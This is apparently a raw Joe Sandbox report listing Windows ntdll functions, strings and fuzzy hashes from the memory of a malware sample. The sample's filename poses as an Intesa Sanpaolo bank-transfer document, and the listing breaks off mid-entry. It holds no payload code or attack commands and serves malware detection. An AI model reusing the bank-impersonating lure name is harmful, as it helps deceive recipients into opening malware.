                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                  • API String ID: 0-2973941816
                                  • Opcode ID: 1aebd090ce6c6f746eaaa277a6bf79624aad96d1a2b10f55785b71251eac1e78
                                  • Instruction ID: e8e28f1c9200463874fd3f978258dbb18f485365feeb1f5eaa6238a66c58fca8
                                  • Opcode Fuzzy Hash: 1aebd090ce6c6f746eaaa277a6bf79624aad96d1a2b10f55785b71251eac1e78
                                  • Instruction Fuzzy Hash: 5F2168321481227FF73C9AAD8C95F667B98FB91E64F140108F261BE980CB74DD01C261
                                  Function 010CEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                  • API String ID: 0-1109411897
                                  • Opcode ID: 8503aa8a14e5e358bb7784359d3261ca2ab58657dfb7fae6c0de18ac30cfabba
                                  • Instruction ID: 6c576a21c4d5a32d32ed94806f0c6bd70d5d9b60c0e90f372600e8512cddb05e
                                  • Opcode Fuzzy Hash: 8503aa8a14e5e358bb7784359d3261ca2ab58657dfb7fae6c0de18ac30cfabba
                                  • Instruction Fuzzy Hash: BDA24874A0566A8FDB68DF18C8887ADBBB1BF45704F1442EED94DA7690DB309E81CF01
                                  Function 010F63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-792281065
                                  • Opcode ID: 96cc3ae89819b2a3b3cb3ca513110bf9417558e95d8a9a3fddb5d45f43974e39
                                  • Instruction ID: bb122d0767eed827f1255b902a931de53011330c9a34c4de2877a98cbd88fb2b
                                  • Opcode Fuzzy Hash: 96cc3ae89819b2a3b3cb3ca513110bf9417558e95d8a9a3fddb5d45f43974e39
                                  • Instruction Fuzzy Hash: 12915D30B017119BDB3DEF58D885BAE7BA1BF91B18F04013CE6507BA85DB75A841C791
                                  Function 010B645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                  Download Yara Rule
                                  Strings
                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01119A2A
                                  • LdrpInitShimEngine, xrefs: 011199F4, 01119A07, 01119A30
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01119A11, 01119A3A
                                  • apphelp.dll, xrefs: 010B6496
                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011199ED
                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01119A01
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-204845295
                                  • Opcode ID: 436a1ff5e51d14341a79b250e33acef5aa675ac85ed739980adf5ac66a7f9290
                                  • Instruction ID: b6ecafaff20d3bfd58c411c607e5d39bc88ef73859be617b9c3583112308b33e
                                  • Opcode Fuzzy Hash: 436a1ff5e51d14341a79b250e33acef5aa675ac85ed739980adf5ac66a7f9290
                                  • Instruction Fuzzy Hash: CE51E3712183089FD728DF24D891BABB7E8FB84748F40092DF5E59B194D731E944CB92
                                  Function 010F2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                  Download Yara Rule
                                  Strings
                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0113219F
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011321BF
                                  • SXS: %s() passed the empty activation context, xrefs: 01132165
                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01132178
                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01132180
                                  • RtlGetAssemblyStorageRoot, xrefs: 01132160, 0113219A, 011321BA
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                  • API String ID: 0-861424205
                                  • Opcode ID: 21691e1e7edf569738767204979976a785be1cc402d1dd4fdb493d16ae34a359
                                  • Instruction ID: 6e127fdb177a1f582d6d2d2b23d2fe43980669737708a549d70b95a3496ffef8
                                  • Opcode Fuzzy Hash: 21691e1e7edf569738767204979976a785be1cc402d1dd4fdb493d16ae34a359
                                  • Instruction Fuzzy Hash: A5310536B40325B7EB259A998C42F6A7B68EBA5A90F05405DFB44AB244D370DE01C6E1
                                  Function 010FC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 010FC6C3
                                  • Loading import redirection DLL: '%wZ', xrefs: 01138170
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01138181, 011381F5
                                  • LdrpInitializeImportRedirection, xrefs: 01138177, 011381EB
                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 011381E5
                                  • LdrpInitializeProcess, xrefs: 010FC6C4
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-475462383
                                  • Opcode ID: 53c435831351197a4f4f5a4ce973e8125717574e9833266219a374734c4f17b8
                                  • Instruction ID: 02472dba63e018ba4b8d85e01c9022a1059ab4364075cd3145f0935ca88a5f24
                                  • Opcode Fuzzy Hash: 53c435831351197a4f4f5a4ce973e8125717574e9833266219a374734c4f17b8
                                  • Instruction Fuzzy Hash: 3A3125717483069FD228EF29D986E5AB7D4EFD4B14F04056CF9C56B291D720EC04C7A2
                                  Function 0110096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 01102DF0: LdrInitializeThunk.NTDLL ref: 01102DFA
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BA3
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BB6
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D60
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D74
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                  • String ID:
                                  • API String ID: 1404860816-0
                                  • Opcode ID: 82d2598ec8009ac33d971c497c3154241b21281ae9f23168c7c4a038c2518ce3
                                  • Instruction ID: 851b17f4cb71c027e1d195b89e615a79eba8706e372ee2490eea5fb9035ca3b7
                                  • Opcode Fuzzy Hash: 82d2598ec8009ac33d971c497c3154241b21281ae9f23168c7c4a038c2518ce3
                                  • Instruction Fuzzy Hash: FA427071900715DFDB29CF28C840BAAB7F4FF48314F1445A9E989EB285E7B0A985CF61
                                  Function 010CA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                  • API String ID: 0-379654539
                                  • Opcode ID: 6e1cf58f85800d0dc3ae322e7aa4058e530d143a63de08ecc13f547e6cd4d025
                                  • Instruction ID: 37d5dce524c0e2fba15246abd82e495db571a7721696b9ee90bbe3c3332ece33
                                  • Opcode Fuzzy Hash: 6e1cf58f85800d0dc3ae322e7aa4058e530d143a63de08ecc13f547e6cd4d025
                                  • Instruction Fuzzy Hash: 6CC1577460838ACBD715DF58C044B6EB7E4BB98B04F04896EF9D68B251E734CA49CF52
                                  Function 010F8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 010F8421
                                  • @, xrefs: 010F8591
                                  • LdrpInitializeProcess, xrefs: 010F8422
                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010F855E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1918872054
                                  • Opcode ID: 7a8bbfc2e2fe51a0db39d35f2124850aabf2bb0f20e9d440b1b4de0ec1631643
                                  • Instruction ID: 5dfabe56bfb77d231692168b9260ba66100c9d621794ed4900cd4113a8538ae2
                                  • Opcode Fuzzy Hash: 7a8bbfc2e2fe51a0db39d35f2124850aabf2bb0f20e9d440b1b4de0ec1631643
                                  • Instruction Fuzzy Hash: 7A91BD71608345AFDB26EF25CC45EABBAE8BF84B44F40492EFAC496140E774D904CB62
                                  Function 010F273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011321D9, 011322B1
                                  • SXS: %s() passed the empty activation context, xrefs: 011321DE
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011322B6
                                  • .Local, xrefs: 010F28D8
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                  • API String ID: 0-1239276146
                                  • Opcode ID: 56a1ff63d997b5517874d3b1e41bc6f04e8f1d174ab65a9acc0b23b23a38a162
                                  • Instruction ID: 74f3399708ea131046782e5ef1d07d06cadb9c6ad6c5824e7fb6c4f4ce7bdcf8
                                  • Opcode Fuzzy Hash: 56a1ff63d997b5517874d3b1e41bc6f04e8f1d174ab65a9acc0b23b23a38a162
                                  • Instruction Fuzzy Hash: E1A1D13190522ADBDB24DF68CC85BA9B3B0BF98354F1541EDDA88AB651D730DE80CF90
                                  Function 010F4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlDeactivateActivationContext, xrefs: 01133425, 01133432, 01133451
                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0113342A
                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01133456
                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01133437
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                  • API String ID: 0-1245972979
                                  • Opcode ID: 9e405a4627c99952395e1f33768686c6a9e7feaf33e513729e2733380c5d7102
                                  • Instruction ID: 7c9476fa8fae1320ed408e567c3881944bc983d8145b604acdfa1b89965f5fbd
                                  • Opcode Fuzzy Hash: 9e405a4627c99952395e1f33768686c6a9e7feaf33e513729e2733380c5d7102
                                  • Instruction Fuzzy Hash: 4D6111326107069BD72ACF1CC882B2AB7E0BF80B60F15856DEEA5DB645D730E801CBD5
                                  Function 010C64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                  Download Yara Rule
                                  Strings
                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0112106B
                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011210AE
                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01120FE5
                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01121028
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                  • API String ID: 0-1468400865
                                  • Opcode ID: 9d2e511d342a63bc58eae4f9d741013042c613888e6659698b0a609b11b1aa62
                                  • Instruction ID: 6e3dbe82ba4a9379c3cbbce05b2c7fcc2059d1d3c243e9333404edaf7d2a3cda
                                  • Opcode Fuzzy Hash: 9d2e511d342a63bc58eae4f9d741013042c613888e6659698b0a609b11b1aa62
                                  • Instruction Fuzzy Hash: E071C1719043059FCB21DF18C884F9B7BA8AFA4B54F10056CF9888B286D775D589CFD2
                                  Function 010F4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                  Download Yara Rule
                                  Strings
                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 0113365C
                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0113362F
                                  • LdrpFindDllActivationContext, xrefs: 01133636, 01133662
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 01133640, 0113366C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 0-3779518884
                                  • Opcode ID: 8e7be0e1cc91367a389f058372312d35368b30c27aa57d77747f33e2a837b632
                                  • Instruction ID: eb2de068767d90bd52a923a3454bcee08583103061ea069206cc4e17b795195d
                                  • Opcode Fuzzy Hash: 8e7be0e1cc91367a389f058372312d35368b30c27aa57d77747f33e2a837b632
                                  • Instruction Fuzzy Hash: 75312C329006119EEF3ABB0CC88BB6776E4BB01654F0A81ADDFD4D7AD1D7A09CC08795
                                  Function 010E245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0112A9A2
                                  • apphelp.dll, xrefs: 010E2462
                                  • LdrpDynamicShimModule, xrefs: 0112A998
                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0112A992
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-176724104
                                  • Opcode ID: abf13d0506d4542c5818e2afaebcb7bdded9b1d115369c55b80988baf2a324bf
                                  • Instruction ID: 1c5ca71988d748b52b917a07663a39288ea535c53b8989a5c6cb1e12b6f24173
                                  • Opcode Fuzzy Hash: abf13d0506d4542c5818e2afaebcb7bdded9b1d115369c55b80988baf2a324bf
                                  • Instruction Fuzzy Hash: C6316AB5B00312ABDB3D9F5AE8C5AAA7BB9FF84B04F150039E960A7244D77058D1CB40
                                  Function 010D29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                  Download Yara Rule
                                  Strings
                                  • HEAP: , xrefs: 010D3264
                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 010D327D
                                  • HEAP[%wZ]: , xrefs: 010D3255
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                  • API String ID: 0-617086771
                                  • Opcode ID: 13e93c56e872e506947de913ecb2ef77dbf8ae47d3aa2ee3fca83a7311b9fca0
                                  • Instruction ID: 475ed4feeeba332068d94cd1781b20629714955c81ecaef2b9f86ab9743b526f
                                  • Opcode Fuzzy Hash: 13e93c56e872e506947de913ecb2ef77dbf8ae47d3aa2ee3fca83a7311b9fca0
                                  • Instruction Fuzzy Hash: 8392BA71A043499FDB29CF68C440BAEBBF1FF48314F1880A9E999AB391D735A941CF51
                                  Function 010D0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-4253913091
                                  • Opcode ID: a9e753c644568c3631785d50caeca364d54b6d9ee0ebba7f07a6e9d39ea0238e
                                  • Instruction ID: 99100de74a788c03772876d0d40a2bdfc7f790d6981f5bf6684758563e397acd
                                  • Opcode Fuzzy Hash: a9e753c644568c3631785d50caeca364d54b6d9ee0ebba7f07a6e9d39ea0238e
                                  • Instruction Fuzzy Hash: 31F1AF70A00606DFEB19CF68C894BAEB7F6FF45304F1481A8E59A9B385D734E981CB51
                                  Function 010E6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: $@
                                  • API String ID: 2994545307-1077428164
                                  • Opcode ID: b35ee1ce680b83d4978cd57b717eefa04885b759fa053bb272732494fa6494ed
                                  • Instruction ID: 52e4931020aabdec7165356128bde71e178995303650eef2eae0c0729f136ea3
                                  • Opcode Fuzzy Hash: b35ee1ce680b83d4978cd57b717eefa04885b759fa053bb272732494fa6494ed
                                  • Instruction Fuzzy Hash: FFC29F716083519FDB69CF29C844BAFBBE5AF88704F04892DFAC987241D775D844CB92
                                  Function 010BA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: FilterFullPath$UseFilter$\??\
                                  • API String ID: 0-2779062949
                                  • Opcode ID: 011ced80e5b360036e3050f047e31221db798b0484ff6b2d64328ccc83c80db2
                                  • Instruction ID: 2d864cebcfe6f4160263d437f8f11a5fc63a3424430284e06413e83bd80f5e33
                                  • Opcode Fuzzy Hash: 011ced80e5b360036e3050f047e31221db798b0484ff6b2d64328ccc83c80db2
                                  • Instruction Fuzzy Hash: F1A16B719556299BDB35EF68CC88BEAF7B8EF48700F1001E9E909A7250D7359E84CF90
                                  Function 010E0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0112A121
                                  • LdrpCheckModule, xrefs: 0112A117
                                  • Failed to allocated memory for shimmed module list, xrefs: 0112A10F
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-161242083
                                  • Opcode ID: 6b68fb31109c3b48d174faee371989b98c0e0a43d24efcaf5b2510a830ae88b5
                                  • Instruction ID: 904566c8b69e316d976c34525813e0f37571152098203e2bc0bb6e2f4cec75f6
                                  • Opcode Fuzzy Hash: 6b68fb31109c3b48d174faee371989b98c0e0a43d24efcaf5b2510a830ae88b5
                                  • Instruction Fuzzy Hash: 1971FF70A0030A9FDB29EF69C984AAEB7F4FF44704F14447DE992AB605E374A991CB40
                                  Function 010D0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-1334570610
                                  • Opcode ID: 88ce4003f702e37c04983e954164b010aaef685e649ec9f06a7a7aa3ff0ba223
                                  • Instruction ID: ca6bb4458fa4b1531834fbf30c01973d007c1d70096f737b70df047d46f21856
                                  • Opcode Fuzzy Hash: 88ce4003f702e37c04983e954164b010aaef685e649ec9f06a7a7aa3ff0ba223
                                  • Instruction Fuzzy Hash: 6661B070604301DFDB69CF28C484BAABBE2FF45714F148599F4998F296D770E891CB91
                                  Function 010FC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                  Download Yara Rule
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 011382E8
                                  • Failed to reallocate the system dirs string !, xrefs: 011382D7
                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 011382DE
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1783798831
                                  • Opcode ID: 201ae57f9ceac6efd3b90d545b2d92d729c4966fa717ddb14e6bb246f6ad1bbb
                                  • Instruction ID: 568623773298b4247406192f69ae01e7b12bb89c63f8b6846575928830609e07
                                  • Opcode Fuzzy Hash: 201ae57f9ceac6efd3b90d545b2d92d729c4966fa717ddb14e6bb246f6ad1bbb
                                  • Instruction Fuzzy Hash: 5F4120B1504309ABD728EB69D986F9B77E8BF58710F00493EFA94D7290E770D840CB91
                                  Function 0117C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                  Download Yara Rule
                                  Strings
                                  • @, xrefs: 0117C1F1
                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0117C1C5
                                  • PreferredUILanguages, xrefs: 0117C212
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                  • API String ID: 0-2968386058
                                  • Opcode ID: 367afed0eff1d542839cc62abc7d2e971bfe1516b50a31c45c2b3ce9c8bdbb00
                                  • Instruction ID: e1ab0fdb7325ed18f4a15093bf5b3f9bf81291367bc537749ab778e8c461bd67
                                  • Opcode Fuzzy Hash: 367afed0eff1d542839cc62abc7d2e971bfe1516b50a31c45c2b3ce9c8bdbb00
                                  • Instruction Fuzzy Hash: 4B415671E0020AEBDF19DFD8C855FEEB7B9AB54704F14416AE605F7280D7749A44CB90
                                  Function 01154144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
